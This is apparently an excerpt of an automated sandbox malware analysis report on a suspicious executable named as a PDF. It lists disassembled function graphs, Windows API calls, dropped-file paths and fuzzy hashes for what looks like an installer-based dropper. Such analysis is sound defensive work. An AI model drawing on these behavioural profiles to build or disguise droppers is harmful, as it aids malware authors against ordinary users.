                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2901622961-0
                                                                                                                                                • Opcode ID: ea1a75e568242b9c33b2ed96f24b2eced80ea02c800ea097d1b7c8c4f431d408
                                                                                                                                                • Instruction ID: c1dd0ba4c6afa04db5033a3826b5e43042ec5fa9b8d6c5df5c2cdf9d5ac6668d
                                                                                                                                                • Opcode Fuzzy Hash: ea1a75e568242b9c33b2ed96f24b2eced80ea02c800ea097d1b7c8c4f431d408
                                                                                                                                                • Instruction Fuzzy Hash: 63A1B3B1644304ABD320AB65DD49F5B7FADFF88750F00093EF685A62E1CB789841CB69
                                                                                                                                                Function 00405B41 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 225stringregistryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 306 405b41-405b5c call 4069fb 309 405b70-405ba6 call 406a8c 306->309 310 405b5e-405b6e call 406734 306->310 315 405ba8-405bb9 call 406a8c 309->315 316 405bbe-405bc4 lstrcatW 309->316 319 405bc9-405bf2 call 405a82 call 40674d 310->319 315->316 316->319 324 405bf8-405bfd 319->324 325 405c8a-405c92 call 40674d 319->325 324->325 326 405c03-405c2c call 406a8c 324->326 331 405ca0-405cce LoadImageW 325->331 332 405c94-405c9b call 405fbd 325->332 326->325 333 405c2e-405c34 326->333 335 405cd0-405cfb RegisterClassW 331->335 336 405d4d-405d55 call 401533 331->336 332->331 337 405c36-405c44 call 40670b 333->337 338 405c47-405c55 lstrlenW 333->338 339 405d04-405d48 SystemParametersInfoW CreateWindowExW 335->339 340 405cfd-405cff 335->340 347 405e07-405e09 336->347 348 405d5b-405d66 call 405a82 336->348 337->338 344 405c57-405c65 lstrcmpiW 338->344 345 405c7d-405c85 call 40666b call 406c2f 338->345 339->336 346 405e0a-405e11 340->346 344->345 351 405c67-405c71 GetFileAttributesW 344->351 345->325 347->346 359 405d6c-405d86 ShowWindow call 4062b3 348->359 360 405dee-405def call 405967 348->360 354 405c73-405c75 351->354 355 405c77-405c78 call 406e25 351->355 354->345 354->355 355->345 367 405d92-405da3 GetClassInfoW 359->367 368 405d88-405d8d call 4062b3 359->368 363 405df4-405df6 360->363 365 405e12-405e14 call 401533 363->365 366 405df8-405dfe 363->366 375 405e19 365->375 366->347 369 405e00-405e02 call 401533 366->369 372 405da5-405db9 GetClassInfoW RegisterClassW 367->372 373 405dbb-405dde DialogBoxParamW call 401533 367->373 368->367 369->347 372->373 377 405de3-405dec call 403dfb 373->377 375->375 377->346
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004069FB: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403918,?), ref: 00406A09
                                                                                                                                                  • Part of subcall function 004069FB: GetProcAddress.KERNEL32(00000000), ref: 00406A25
                                                                                                                                                • lstrcatW.KERNEL32(1033,00421200,80000001,Control Panel\Desktop\ResourceLocale,00000000,00421200,00000000,00000002,00000000,776A3420,00000000,776A3170), ref: 00405BC4
                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Anvilled,1033,00421200,80000001,Control Panel\Desktop\ResourceLocale,00000000,00421200,00000000,00000002,00000000), ref: 00405C48
                                                                                                                                                • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Anvilled,1033,00421200,80000001,Control Panel\Desktop\ResourceLocale,00000000,00421200,00000000), ref: 00405C5D
                                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00405C68
                                                                                                                                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Anvilled), ref: 00405CB1
                                                                                                                                                  • Part of subcall function 00406734: wsprintfW.USER32 ref: 00406741
                                                                                                                                                • RegisterClassW.USER32(00428CE0), ref: 00405CF6
                                                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00405D0D
                                                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405D42
                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405D74
                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428CE0), ref: 00405D9F
                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00428CE0), ref: 00405DAC
                                                                                                                                                • RegisterClassW.USER32(00428CE0), ref: 00405DB9
                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00405095,00000000), ref: 00405DD4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Anvilled$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                • API String ID: 1975747703-1429194998
                                                                                                                                                • Opcode ID: edc898fe0945ce5741e5c6398a2f53b5c95347c49c29c129406737a47328b788
                                                                                                                                                • Instruction ID: a853d14af79947da6f9b2e8ec0e988c18d5098f7c5c81f72d75faaabc62159d3
                                                                                                                                                • Opcode Fuzzy Hash: edc898fe0945ce5741e5c6398a2f53b5c95347c49c29c129406737a47328b788
                                                                                                                                                • Instruction Fuzzy Hash: B461E570201605BEE620AB65EE46F2B366CEF14758F51403FF941B61E1DF7C59018EAD
                                                                                                                                                Function 0040682E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155filestringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 715 40682e-406857 call 40674d 718 406870-40687a 715->718 719 406859-40686b DeleteFileW 715->719 721 40687c-40687e 718->721 722 40688d-4068a0 call 406c2f 718->722 720 4069ef-4069f8 719->720 723 406884-406887 721->723 724 4069de-4069e4 721->724 730 4068b0-4068b1 call 406e25 722->730 731 4068a2-4068ae lstrcatW 722->731 723->722 726 4069a7-4069af call 4066e4 723->726 728 4069ee 724->728 726->728 737 4069b1-4069c5 call 40666b call 40669a 726->737 728->720 733 4068b6-4068bb 730->733 731->733 735 4068c7-4068cd lstrcatW 733->735 736 4068bd-4068c5 733->736 738 4068cf-4068f2 lstrlenW FindFirstFileW 735->738 736->735 736->738 751 4069e6-4069e9 call 405e3d 737->751 752 4069c7-4069c9 737->752 740 406990-406995 738->740 741 4068f8-4068fa 738->741 740->728 745 406997-4069a5 740->745 743 4068fb-406900 741->743 746 406902-406908 743->746 747 406919-40692c call 406c2f 743->747 745->724 745->726 749 406972-406983 FindNextFileW 746->749 750 40690a-40690f 746->750 760 406940-406949 call 40669a 747->760 761 40692e-406935 747->761 749->743 758 406989-40698a FindClose 749->758 750->747 755 406911-406917 750->755 751->728 752->724 756 4069cb-4069dc call 405e3d call 406352 752->756 755->747 755->749 756->728 758->740 768 40696a-40696d call 405e3d 760->768 769 40694b-40694d 760->769 761->749 764 406937-406939 call 40682e 761->764 771 40693e 764->771 768->749 772 406962-406968 769->772 773 40694f-406960 call 405e3d call 406352 769->773 771->749 772->749 773->749
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040674D: lstrlenW.KERNEL32(00425A78,00000000,00425A78,00425A78,00000000,?,?,00406850,?,00000000,776A3420,00000000), ref: 004067A1
                                                                                                                                                  • Part of subcall function 0040674D: GetFileAttributesW.KERNEL32(00425A78,00425A78), ref: 004067B2
                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,00000000,776A3420,00000000), ref: 0040685A
                                                                                                                                                • lstrcatW.KERNEL32(00425278,\*.*,00425278,?,00000000,?,00000000,776A3420,00000000), ref: 004068AC
                                                                                                                                                • lstrcatW.KERNEL32(?,004082B0,?,00425278,?,00000000,?,00000000,776A3420,00000000), ref: 004068CD
                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004068D0
                                                                                                                                                • FindFirstFileW.KERNEL32(00425278,?), ref: 004068E7
                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406978
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040698A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                                                                                                • String ID: \*.*
                                                                                                                                                • API String ID: 2636146433-1173974218
                                                                                                                                                • Opcode ID: 463e512100b669bbf7148d43155592073aa84a6e49227fc6e470d5d44a4eaa6f
                                                                                                                                                • Instruction ID: 1679f268d6f2e5967709a76d03bf4fa32a028c009496777b7310e2c01a678238
                                                                                                                                                • Opcode Fuzzy Hash: 463e512100b669bbf7148d43155592073aa84a6e49227fc6e470d5d44a4eaa6f
                                                                                                                                                • Instruction Fuzzy Hash: DD413871105711A9D320BB358D05A7B76A8DF41314F16093FF893B25D1EB3C8D6686BE
                                                                                                                                                Function 004066E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,00427678,00000000,00406791,00425A78), ref: 004066EF
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004066FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                • String ID: xvB
                                                                                                                                                • API String ID: 2295610775-1142169142
                                                                                                                                                • Opcode ID: d8979bb77e590fa5ef2a9612d96aa81559f91ada1dd450823ce235b6f1bcece9
                                                                                                                                                • Instruction ID: e316ebd25e92877113dce2226e0b75b13365ed97af6927094cd3affcf016b760
                                                                                                                                                • Opcode Fuzzy Hash: d8979bb77e590fa5ef2a9612d96aa81559f91ada1dd450823ce235b6f1bcece9
                                                                                                                                                • Instruction Fuzzy Hash: 17D0127150A1209BD2401778AE0C85B7A59AF153757524B36F0A6F21E0E7348C6286AC
                                                                                                                                                Function 00405095 Relevance: 52.9, APIs: 35, Instructions: 374windowstringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 197 405095-4050ae 198 4050b4-4050ba 197->198 199 405236-405248 197->199 198->199 200 4050c0-4050c3 198->200 201 405290-4052a4 199->201 202 40524a-40528a GetDlgItem * 2 call 40561d SetClassLongW call 401533 199->202 205 4050c5-4050da SetWindowPos 200->205 206 4050df-4050e2 200->206 203 4052e2-4052e7 call 4055eb 201->203 204 4052a6-4052a8 201->204 202->201 218 4052ec-40530b 203->218 208 4052da-4052dc 204->208 209 4052aa-4052b5 call 401399 204->209 210 405222 205->210 212 405132-405138 206->212 213 4050e4-405103 ShowWindow 206->213 208->203 216 4055ad 208->216 209->208 233 4052b7-4052d5 SendMessageW 209->233 217 405226-405231 call 40585e 210->217 220 405154-405157 212->220 221 40513a-40514f DestroyWindow 212->221 213->217 219 405109-40511f GetWindowLongW 213->219 231 4055af-4055b6 216->231 217->231 225 40530d-405318 call 401533 218->225 226 40531e-405324 218->226 219->217 227 405125-40512d ShowWindow 219->227 229 405159-405167 SetWindowLongW 220->229 230 40516c-405172 220->230 228 405591-405598 221->228 225->226 237 40532a-40532c 226->237 238 40556d-405586 DestroyWindow EndDialog 226->238 227->217 228->216 236 40559a-40559c 228->236 229->231 230->210 239 405178-405192 GetDlgItem 230->239 233->231 236->216 244 40559e-4055a7 ShowWindow 236->244 237->238 245 405332-405389 call 405fbd call 40561d * 3 GetDlgItem 237->245 242 40558c 238->242 240 405194-4051ad SendMessageW IsWindowEnabled 239->240 241 4051b7-4051bc 239->241 240->216 246 4051b3 240->246 247 4051c1-4051c4 241->247 248 4051be-4051bf 241->248 242->228 244->216 273 405397-4053e6 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 245->273 274 40538b-405393 245->274 246->241 252 4051d3-4051d6 247->252 253 4051c6-4051cd 247->253 251 405202-405207 call 405a5b 248->251 251->217 256 405209-40521c SendMessageW 252->256 258 4051d8-4051df 252->258 253->256 257 4051cf-4051d1 253->257 256->210 257->251 261 4051e1-4051ed call 401533 258->261 262 4051ef-4051f8 call 401533 258->262 270 405200 261->270 262->217 271 4051fa 262->271 270->251 271->270 275 4053e8-4053e9 273->275 276 4053eb 273->276 274->273 277 4053ec-405417 GetSystemMenu EnableMenuItem SendMessageW 275->277 276->277 278 405430 277->278 279 405419-40542e SendMessageW 277->279 280 405436-40547c call 405606 call 405e1e call 406c2f lstrlenW call 405fbd SetWindowTextW call 401399 278->280 279->280 280->218 291 405482-405484 280->291 291->218 292 40548a-40548e 291->292 293 405490-405496 292->293 294 4054ad-4054c1 DestroyWindow 292->294 293->216 295 40549c-4054a2 293->295 294->242 296 4054c7-4054f4 CreateDialogParamW 294->296 295->218 298 4054a8 295->298 296->228 297 4054fa-405551 call 40561d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 296->297 297->216 303 405553-405566 ShowWindow call 4055eb 297->303 298->216 305 40556b 303->305 305->242
                                                                                                                                                APIs
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004050D4
                                                                                                                                                • ShowWindow.USER32(?), ref: 004050FE
                                                                                                                                                • GetWindowLongW.USER32(?,?), ref: 0040510F
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 0040512B
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00405252
                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040525C
                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00405276
                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004052C4
                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00405373
                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040539C
                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004053B0
                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?), ref: 004053C4
                                                                                                                                                • EnableWindow.USER32(?), ref: 004053DC
                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004053F3
                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004053FA
                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 0040540B
                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00405422
                                                                                                                                                • lstrlenW.KERNEL32(00421200,?,00421200,00000000), ref: 00405453
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • SetWindowTextW.USER32(?,00421200), ref: 0040546B
                                                                                                                                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                                                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                                                                                • DestroyWindow.USER32(?,00000000), ref: 004054B3
                                                                                                                                                • CreateDialogParamW.USER32(?,?,-00429D60), ref: 004054E7
                                                                                                                                                  • Part of subcall function 0040561D: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405637
                                                                                                                                                • GetDlgItem.USER32(?,000003FA), ref: 00405510
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00405517
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00405523
                                                                                                                                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 0040553C
                                                                                                                                                • ShowWindow.USER32(?,?,00000000), ref: 0040555B
                                                                                                                                                  • Part of subcall function 004055EB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004055FD
                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004055A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 162979904-0
                                                                                                                                                • Opcode ID: ba739dc4ba6d18f16267d183e3e068b8daf47d42d4500b1c76a39e8f7c61ad0f
                                                                                                                                                • Instruction ID: dde6768bf825ec23dd98222ce6025154883a759c232661181bb8438464b7c65b
                                                                                                                                                • Opcode Fuzzy Hash: ba739dc4ba6d18f16267d183e3e068b8daf47d42d4500b1c76a39e8f7c61ad0f
                                                                                                                                                • Instruction Fuzzy Hash: F2D1DD71601A10BBDB206F21ED48E2B7BA9FF58355F80493EF545B21E1CA388852DF6D
                                                                                                                                                Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441stringtimesleepCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 380 40154a-4015bd 381 402ea1 380->381 382 4015c3-4015c7 380->382 402 402ea5 381->402 383 4016c1-4016cf 382->383 384 4017c2-401e9e call 40303e call 4066e4 382->384 385 401684-4016aa 382->385 386 4015e6-4015ee 382->386 387 4018cb-4018d4 call 40303e call 406b6b 382->387 388 40160c-40160d 382->388 389 4015ce-4015d0 382->389 390 4016ef-4016fb call 40303e SetFileAttributesW 382->390 391 4016af-4016bc call 406734 382->391 392 40182f-40184b call 40303e GetFullPathNameW 382->392 393 401711-401728 call 40303e call 406cda 382->393 394 401633-40163a SetForegroundWindow 382->394 395 4017d3-4017f6 call 40303e * 3 MoveFileW 382->395 396 4015d5-4015d6 382->396 397 401618-40162e call 403002 Sleep 382->397 398 4015f9-401607 call 4030fd call 401399 382->398 399 40189b-4018b8 call 40303e SearchPathW 382->399 400 4018de-401904 call 40303e call 406f18 382->400 401 40163f-401645 382->401 420 4016d1-4016d5 ShowWindow 383->420 421 4016d9-4016e0 383->421 478 401bb2-401bb6 384->478 479 401ea4-401ea8 384->479 418 402ead-402eb7 385->418 404 4015f0-4015f7 PostQuitMessage 386->404 405 4015dc-4015e1 386->405 457 4018d9 387->457 412 40160e-401613 call 405e3d 388->412 389->418 440 401701-401703 390->440 391->381 450 401857-40185d 392->450 451 40184d-401855 392->451 465 401784-40178e 393->465 466 40172a-40173f call 40670b 393->466 394->381 481 401804-401808 395->481 482 4017f8-4017ff 395->482 422 4015d7 call 405e3d 396->422 397->381 398->418 399->381 444 4018be-4018c6 399->444 468 401906-40190c call 406c2f 400->468 469 40190e-401920 call 406c2f call 40666b lstrcatW 400->469 415 401671-40167f 401->415 416 401647 401->416 403 402eab 402->403 403->418 404->405 405->418 412->381 415->381 434 401657-40166c call 403002 416->434 435 401649-401650 416->435 420->421 421->381 438 4016e6-4016ea ShowWindow 421->438 422->405 434->381 435->434 438->381 440->381 452 401709-40170c 440->452 444->402 461 40187b 450->461 462 40185f-401862 450->462 460 40187f-401883 451->460 452->402 457->440 460->402 463 401889-401896 GetShortPathNameW 460->463 461->460 462->461 470 401864-40186c call 4066e4 462->470 463->402 475 401790-4017ab call 405e3d call 406c2f SetCurrentDirectoryW 465->475 476 4017bb-4017bd 465->476 487 401741-401745 466->487 488 401758-401759 call 405f21 466->488 490 401925-40192d call 406e52 468->490 469->490 470->451 493 40186e-401876 call 406c2f 470->493 475->381 511 4017b1-4017b6 475->511 476->412 478->418 479->418 481->452 489 40180e-401816 call 4066e4 481->489 482->412 487->488 494 401747-40174e call 406611 487->494 503 40175e-401760 488->503 489->452 507 40181c-40182a call 406352 489->507 510 40192e-401931 490->510 493->461 494->488 512 401750-401751 call 405f41 494->512 508 401762-401767 503->508 509 401775-40177e 503->509 507->412 514 401774 508->514 515 401769-401772 GetFileAttributesW 508->515 509->466 516 401780 509->516 517 401933-40193d call 4066e4 510->517 518 401964-401966 510->518 511->381 526 401756 512->526 514->509 515->509 515->514 516->465 528 401950-401960 517->528 529 40193f-40194e CompareFileTime 517->529 519 401968-401969 call 406cb2 518->519 520 40196e-401989 call 406a30 518->520 519->520 531 401a18-401a49 call 405e3d call 4032c7 520->531 532 40198f-401991 520->532 526->503 528->518 529->528 545 401a52-401a5a SetFileTime 531->545 546 401a4b-401a50 531->546 533 401993-4019df call 406c2f * 2 call 405fbd call 406c2f call 406bbd 532->533 534 4019fd-401a13 call 405e3d 532->534 533->510 563 4019e5-4019e8 533->563 534->402 547 401a60-401a6d CloseHandle 545->547 546->545 546->547 547->381 549 401a73-401a76 547->549 551 401a78-401a87 call 405fbd lstrcatW 549->551 552 401a89-401a8c call 405fbd 549->552 558 401a91-401a9c call 406bbd 551->558 552->558 558->405 558->478 564 4019f2-4019f8 563->564 565 4019ea-4019ed 563->565 564->403 565->422
                                                                                                                                                APIs
                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                                                                                                • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                                                                                                • SetForegroundWindow.USER32 ref: 00401634
                                                                                                                                                • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                                                                                                • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,?,?,?,00000000,00000000), ref: 004016FB
                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00000000), ref: 0040176A
                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Anvilled,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll), ref: 004017A3
                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Anvilled,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Anvilled,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
